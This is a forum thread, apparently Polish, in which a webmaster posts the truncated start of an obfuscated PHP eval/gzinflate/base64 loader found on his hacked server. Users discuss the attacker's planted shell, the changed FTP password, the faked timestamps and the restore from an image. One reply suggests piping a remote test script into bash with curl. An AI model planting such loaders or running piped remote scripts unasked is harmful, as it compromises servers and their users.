borysses
g/webdev

WTF is this bullshit...

<?php eval(gzinflate(base64_decode('lVltc9pIEv7MVd1/UCjFSDEGSYBtYstONnF2t+qyyRFyVVdxlhrECLQWklYSBGLlv9/TPRLIb3d7qQSGme6efu+eTuBrxrOZ9INIzoyWny7fZi3TvP373xpqs9rT2rZ5hl2ZpnE6SWUSp3kQzQ2Ld3HgryIvD+JIA43JLNQMfZWGpkaUGgEuqc4nchNkeWa0PJxPgijIcZ8Ca+jeQnO13YEiQbc2GryZyTxOcgNgbe3N59E/PnwcT0ZX48+j38aj1799enc1amuKzUZDj1d5RUxupAeGvAUzq/hhgpAmivlAe+a6mmVqJZovwkzWbvbCOJM1Ej80CQDttgR/5QehnMxlPvHiKJcR5GPxz34Q86nMV2mk5WmwNAiBuaAT/K3UwmrzUpIuiFj/DT0I3SxPQxnx3pkeu60W8+THKXgJIJ51puH7HB8hrQ4PSYKOCxpf9OCr9rvWeqFQSh70mAg8djeY94S3kIaeL5NZkLb1MIhu2rq3zIOlbOt5LF3WSsmcj9tL0E6rm8ksm7Q6y9nASFI5JwcJhSeNVvf3RZ4nL6+7190vv193vx52W22thX9M3lQG0X0JaqzD0jt0X50EvvGMTotCIzYMUztiOGbKAJR2oR1b2gut5NMkf...

Tzn. wiem, pierdolony pharma attack ;__;

2014 i dalej infekuje...

#
akerro

@borysses: how mad? :D

#
borysses

@akerro: Verey mad. Czyszcze wlasnie serwer z kodu, skurwiel wbil sie wszedzie, wszystkie sajty na serwerze to maja. Sprawdzam jeszcze baze danych i pliki...

Jebaniec modyfikuje pliki doklejajac tego base_64 i wkleja date modyfikacji jaka byla w oryginalnym pliku ;__;

robie svn diff po rozmiarze.

#
akerro

@borysses: wyobraź sobie teraz że nie ma tego svna ani gita...

#
borysses

@akerro: Wtedy tylko chlastac sie czerstwym rogalem po powiekach... Albo przywracac server z obrazu albo kopia plikow z dev :)

#
borysses

@akerro: Oh, jeszcze skurwiel shella zainstalowal i zmienil pass do ftp...

#
borysses

@akerro: Caly server poszed do dev/null na wszelki wypadek. Sprawdzilem logi i dziwne sessje zaczely sie pojawiac wczoraj o 21:45. Wyjebalem chama i przywrocilem server z obrazu i baze z kopii. Wszystko wyglada OK a svn diff pokazuje wszystko tak jak ma byc. No to teraz tylko odkryc jak to gowno sie wbilo...

#
zskk

@borysses: szelszok pewnie któryś :P mowilem ze mozecie wziac moja oferte :P

#
borysses

@zskk: sysadmin niby paczowal...

#
borysses

@akerro: no to teraz musze userom dać znać, że passwordy muszą zmienić. Not a big deal. Łącznie jakieś 4k pipol.

#
zskk

@borysses:

curl https://shellshocker.net/shellshock_test.sh | bash

#
borysses

@zskk: Sprawdzałem i nic nie wypisuje, wiec to nie to. Co ciekawe na koncu stringu z base_64 był znaczek ctrl+v i nowej lini w dosie/windzie co w kodzie targetującym systemy unixowe raczej sensu nie ma. Jednak mielismy problem z malware w korp_lanie i sie zastanawiam, czy ktos kto edytuje kontent, zrobil kopiuj wklej a to gowno sie doczepilo... a jak juz znalazlo sie na serwerze to zaczelo broic.

#